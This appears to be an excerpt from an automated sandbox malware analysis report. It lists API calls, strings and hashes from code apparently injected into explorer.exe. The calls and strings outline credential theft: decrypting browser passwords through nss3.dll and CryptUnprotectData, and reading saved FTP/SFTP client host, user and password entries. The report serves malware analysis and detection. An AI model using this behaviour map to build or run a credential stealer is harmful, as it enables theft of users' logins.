                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memset
                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                        • API String ID: 2221118986-594550510
                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 03002127
                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0300213A
                        • wsprintfA.USER32 ref: 0300214F
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                        • String ID: %li
                        • API String ID: 4120667308-1021419598
                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,03003E4B,00000000), ref: 0300124A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03001268
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03001295
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                        • String ID:
                        • API String ID: 117552131-0
                        APIs
                        • lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,030046E3), ref: 030011ED
                        • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0300120F
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 03001231
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                        • String ID:
                        • API String ID: 117552131-0
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03001FFA
                        • RtlMoveMemory.NTDLL(?,?,?), ref: 03002015
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: CryptDataMemoryMoveUnprotect
                        • String ID:
                        • API String ID: 2807545630-0
                        APIs
                        • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 030011B2
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                        • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 030011D2
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: BinaryCryptHeapString$AllocateProcess
                        • String ID:
                        • API String ID: 3825993179-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _alldiv_allmul
                        • String ID:
                        • API String ID: 727729158-0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memset
                        • String ID:
                        • API String ID: 2221118986-0
                        APIs
                        • SysAllocString.OLEAUT32(?), ref: 030044AA
                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0300456E
                        • lstrcmpiW.KERNEL32(Servers,?), ref: 0300457D
                        • lstrcmpiW.KERNEL32(Settings,?), ref: 0300458C
                          • Part of subcall function 030011E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,030046E3), ref: 030011ED
                          • Part of subcall function 030011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0300120F
                          • Part of subcall function 030011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 03001231
                        • lstrcmpiW.KERNEL32(Server,?), ref: 030045BE
                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 030045CD
                        • lstrcmpiW.KERNEL32(Host,?), ref: 03004657
                        • lstrcmpiW.KERNEL32(Port,?), ref: 03004679
                        • lstrcmpiW.KERNEL32(User,?), ref: 0300469F
                        • lstrcmpiW.KERNEL32(Pass,?), ref: 030046C5
                        • wsprintfW.USER32 ref: 0300471E
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrcmpi$String$BinaryCrypt$Alloclstrlenwsprintf
                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                        • API String ID: 1416614492-1234691226
                        APIs
                          • Part of subcall function 03001000: GetProcessHeap.KERNEL32(00000008,?,030011C7,?,?,00000001,00000000,?), ref: 03001003
                          • Part of subcall function 03001000: RtlAllocateHeap.NTDLL(00000000), ref: 0300100A
                          • Part of subcall function 03001090: lstrlenW.KERNEL32(?,?,00000000,030017E5), ref: 03001097
                          • Part of subcall function 03001090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 030010A8
                          • Part of subcall function 030019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03002CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030019C4
                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 03002503
                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0300250A
                        • LoadLibraryW.KERNEL32(00000000), ref: 03002563
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 03002570
                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 03002591
                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0300259E
                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 030025AB
                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 030025B8
                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 030025C5
                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 030025D2
                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 030025DF
                          • Part of subcall function 0300190B: lstrlen.KERNEL32(?,?,?,?,00000000,03002783), ref: 0300192B
                          • Part of subcall function 0300190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,03002783), ref: 03001930
                          • Part of subcall function 0300190B: lstrcat.KERNEL32(00000000,?), ref: 03001946
                          • Part of subcall function 0300190B: lstrcat.KERNEL32(00000000,00000000), ref: 0300194A
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                        • API String ID: 3366569387-3272982511
                        APIs
                          • Part of subcall function 03005BF5: memset.NTDLL ref: 03005C07
                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030060E1
                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 030060EC
                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 03006113
                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0300618E
                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 030061B5
                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 030061C1
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _alldiv$_allrem$memset
                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                        • API String ID: 2557048445-1989508764
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcmp
                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                        • API String ID: 1475443563-3683840195
                        APIs
                          • Part of subcall function 030019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A1E
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A3C
                          • Part of subcall function 030019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03001A75
                          • Part of subcall function 030019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03001AE2,PortNumber,00000000,00000000), ref: 03001A98
                          • Part of subcall function 0300482C: lstrlenW.KERNEL32(?), ref: 03004845
                          • Part of subcall function 0300482C: lstrlenW.KERNEL32(?), ref: 0300488F
                          • Part of subcall function 0300482C: lstrlenW.KERNEL32(?), ref: 03004897
                        • wsprintfW.USER32 ref: 030049A7
                        • wsprintfW.USER32 ref: 030049B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                        • API String ID: 2889301010-4273187114
                        APIs
                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 0300FB32
                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0300FB4D
                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0300FB60
                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0300FB95
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: -journal$-wal$immutable$nolock
                        • API String ID: 3510742995-3408036318
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: %$-x0$NaN
                        • API String ID: 0-62881354
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: -x0$NaN
                        • API String ID: 0-3447725786
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: -x0$NaN
                        • API String ID: 0-3447725786
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: -x0$NaN
                        • API String ID: 0-3447725786
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: -x0$NaN
                        • API String ID: 0-3447725786
                        APIs
                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0300720E
                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 03007226
                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0300727B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _aulldvrm$_aullrem
                        • String ID: -x0$NaN
                        • API String ID: 105165338-3447725786
                        • Opcode ID: e30b5c5ed10c6a8c6bf5b6c2cf0ca43b4b264b325b2fe096084a2606ae1dba00
                        • Instruction ID: 2e115567dc9d5d797a42a0a6c3dd2a3b69e4ceb9cde901706855aca770115a6a
                        • Opcode Fuzzy Hash: e30b5c5ed10c6a8c6bf5b6c2cf0ca43b4b264b325b2fe096084a2606ae1dba00
                        • Instruction Fuzzy Hash: 44D1F37060E3828BF765CA28C49077FFBE6AFC5A04F18499DF8C1872D1D669E945C782
                        APIs
                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 03008AAD
                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 03008B66
                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 03008C9B
                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 03008CAE
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _allmul$_alldvrm
                        • String ID: .
                        • API String ID: 115548886-248832578
                        • Opcode ID: ce631160d33281f888376f3ed8b91363eaf16788d981ce8d709108d3fdbe440c
                        • Instruction ID: e3f40d7879c70c1c541cb15fd22d34443cb1263848b6cd39ff8778e31e441615
                        • Opcode Fuzzy Hash: ce631160d33281f888376f3ed8b91363eaf16788d981ce8d709108d3fdbe440c
                        • Instruction Fuzzy Hash: BBD105B190E7858BE714DF08888066EFBF5BBC5314F088E6EF6D5962C0D3B5C5458B86
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memset
                        • String ID: ,$7$9
                        • API String ID: 2221118986-1653249994
                        • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                        • Instruction ID: 7641ee9f76198fc3343ea256b697695919fa0e38bfb1c0f6ac62c8dcff5c27bc
                        • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                        • Instruction Fuzzy Hash: 25316B715093949FD330DF60D840BCFBBE8AFC5240F00892EE98997251EB759549CBA2
                        APIs
                        • lstrlenW.KERNEL32(00000000,00000000,?,03002E75,PathToExe,00000000,00000000), ref: 03001BCC
                        • StrStrIW.SHLWAPI(00000000,.exe,?,03002E75,PathToExe,00000000,00000000), ref: 03001BF0
                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,03002E75,PathToExe,00000000,00000000), ref: 03001C05
                        • lstrlenW.KERNEL32(00000000,?,03002E75,PathToExe,00000000,00000000), ref: 03001C1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: .exe
                        • API String ID: 1659193697-4119554291
                        • Opcode ID: d386892d0aa6b9578a20c6780d06209b1b0a04b4b7dddeb4e881d330eb7a5a80
                        • Instruction ID: 20105b287961f166e0901b59e4c8e67afd66c63762b3159f8bd665f5c9ce1c65
                        • Opcode Fuzzy Hash: d386892d0aa6b9578a20c6780d06209b1b0a04b4b7dddeb4e881d330eb7a5a80
                        • Instruction Fuzzy Hash: 56F0C2393133209AF7A9AF34AC45ABF62E5EF05341F18682AE082C71D1FB65C841C759
                        APIs
                        • _allmul.NTDLL(?,00000000,00000018), ref: 0301316F
                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 030131D2
                        • _alldiv.NTDLL(?,?,00000000), ref: 030132DE
                        • _allmul.NTDLL(00000000,?,00000000), ref: 030132E7
                        • _allmul.NTDLL(?,00000000,?,?), ref: 03013392
                          • Part of subcall function 030116CD: memset.NTDLL ref: 0301172B
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _allmul$_alldivmemset
                        • String ID:
                        • API String ID: 3880648599-0
                        • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                        • Instruction ID: 4b4ca80173eab79b6a433bc1243c6d4582dca07f16ff5bf0550d81dc7c31a8f4
                        • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                        • Instruction Fuzzy Hash: 66D1AA7860A3418FDB64DF69C480BAEBBE5BFC8704F08486DF98587250DB70E855CB96
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID: FOREIGN KEY constraint failed$new$old
                        • API String ID: 0-384346570
                        • Opcode ID: d66d7774c98a03689d07452ebcc1320b089d41299d1a8b50beb192c528306318
                        • Instruction ID: 8df1d238cd4fe03648880d236228eb0c0e150f6aec6a7ef26237f18d3ed307a6
                        • Opcode Fuzzy Hash: d66d7774c98a03689d07452ebcc1320b089d41299d1a8b50beb192c528306318
                        • Instruction Fuzzy Hash: 78D146B87093009FDB14DF24C880B6FBBE9ABC9754F14895EF9858B280DB74D945CB92
                        APIs
                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 030096E7
                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 03009707
                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 03009739
                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0300976C
                        • _allmul.NTDLL(?,?,?,?), ref: 03009798
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _alldiv$_allmul
                        • String ID:
                        • API String ID: 4215241517-0
                        • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                        • Instruction ID: 1eb7c495bdca551fafbed5920376d1972086469b432479b03036ea8369b954c5
                        • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                        • Instruction Fuzzy Hash: BA21F2375077152AF774DD1A9CC0BAFB5CDDBC1295F29453DEC19862F3EB52840180A2
                        APIs
                        • _allmul.NTDLL(?,00000000,00000000), ref: 0301B1B3
                        • _alldvrm.NTDLL(?,?,00000000), ref: 0301B20F
                        • _allrem.NTDLL(?,00000000,?,?), ref: 0301B28A
                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0301B298
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _alldvrm_allmul_allremmemcpy
                        • String ID:
                        • API String ID: 1484705121-0
                        • Opcode ID: d0f4d66e9549b5788a2ee66365e866876d7701f9283c29450d11e4002fb57481
                        • Instruction ID: 5f4a43eb64065433c992389655c3c581660092e48b6657e94127fcaec67598b7
                        • Opcode Fuzzy Hash: d0f4d66e9549b5788a2ee66365e866876d7701f9283c29450d11e4002fb57481
                        • Instruction Fuzzy Hash: 1141387960A3419FC754EF29C89096FFBE5BFC8200F44492DF9858B261DB31E855CB92
                        APIs
                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,03002F0C), ref: 03001973
                        • lstrlenW.KERNEL32(03056564,?,?,03002F0C), ref: 03001978
                        • lstrcatW.KERNEL32(00000000,?), ref: 03001990
                        • lstrcatW.KERNEL32(00000000,03056564), ref: 03001994
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrcatlstrlen
                        • String ID:
                        • API String ID: 1475610065-0
                        • Opcode ID: de6cb70b0bf3c695e8256e80a4d554de663035b66755b6bcc17baea6eaa86064
                        • Instruction ID: b43e7113c9fb1022438fd5ecf45c344782dcaa68cad756deb4433f27724b7c9c
                        • Opcode Fuzzy Hash: de6cb70b0bf3c695e8256e80a4d554de663035b66755b6bcc17baea6eaa86064
                        • Instruction Fuzzy Hash: 43E065B630131C1B9714B6AE9C94E7B76DCCAC95A57090079FA45D3205EA569C0546B0
                        APIs
                          • Part of subcall function 03006A81: memset.NTDLL ref: 03006A9C
                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0302F2A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _aulldivmemset
                        • String ID: %llu$%llu
                        • API String ID: 714058258-4283164361
                        • Opcode ID: 0b065b33dd90883ce3595e3683447230eaf9785b93e5722f4a4afedce2ce3808
                        • Instruction ID: 6d1c2290fe682505799045bd3eec2a818c32031267d45701cd2f139f8a09cfaa
                        • Opcode Fuzzy Hash: 0b065b33dd90883ce3595e3683447230eaf9785b93e5722f4a4afedce2ce3808
                        • Instruction Fuzzy Hash: 8021D4B664131A6BD710EA24CC41EAFB7A9EFC1770F054628F9219B2C0DB21AC2587E1
                        APIs
                        • _allmul.NTDLL(?,00000000,?), ref: 03012174
                        • _allmul.NTDLL(?,?,?,00000000), ref: 0301220E
                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 03012241
                        • _allmul.NTDLL(03002E26,00000000,?,?), ref: 03012295
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: _allmul
                        • String ID:
                        • API String ID: 4029198491-0
                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                        • Instruction ID: 63d3a838ff41839d321cf49062a5ac6dd1d3eb0cc56301ada9ad718e4530c558
                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                        • Instruction Fuzzy Hash: 0CA18C74709705AFD758EF68C880A6EB7EAAFC8704F044C2CF6558B250EB71EC648B42
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: memcpymemset
                        • String ID:
                        • API String ID: 1297977491-0
                        • Opcode ID: bd4ab3b7838220b670d7bb475dfb9323845348dcb333e0ac54c314299f671957
                        • Instruction ID: 4b5374e43ba44e9cd6a8d848130709b041e4771c7e66d0c9c22d446f16928f80
                        • Opcode Fuzzy Hash: bd4ab3b7838220b670d7bb475dfb9323845348dcb333e0ac54c314299f671957
                        • Instruction Fuzzy Hash: 7781A17560A3149FC350DF29C880A6BBBE5FFC8A04F44496DF88A9B351D771E918CB91
                        APIs
                        • lstrlen.KERNEL32(?,?,?,?,00000000,03002783), ref: 0300192B
                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,03002783), ref: 03001930
                        • lstrcat.KERNEL32(00000000,?), ref: 03001946
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0300194A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1956345642.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_3001000_explorer.jbxd
                        Similarity
                        • API ID: lstrcatlstrlen
                        • String ID:
                        • API String ID: 1475610065-0
                        • Opcode ID: 1b705cdb9450e3d1d2576c6965ea58b20874b70f40edabeece680a6a95d5360c
                        • Instruction ID: e55e12fcbb26e66f0ac42f9b7616a7ee53cba811fbfa076984f7e3786f9db697
                        • Opcode Fuzzy Hash: 1b705cdb9450e3d1d2576c6965ea58b20874b70f40edabeece680a6a95d5360c
                        • Instruction Fuzzy Hash: 96E02BA630131C2B5B24B2AE5C84E7B76DCCAC81A17090075FE05C3201EE569C0146B0

                        Execution Graph

                        Execution Coverage:21.6%
                        Dynamic/Decrypted Code Coverage:87.1%
                        Signature Coverage:0%
                        Total number of Nodes:178
                        Total number of Limit Nodes:16

                        Callgraph


                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNext
                        • String ID:
                        • API String ID: 3541575487-0
                        • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
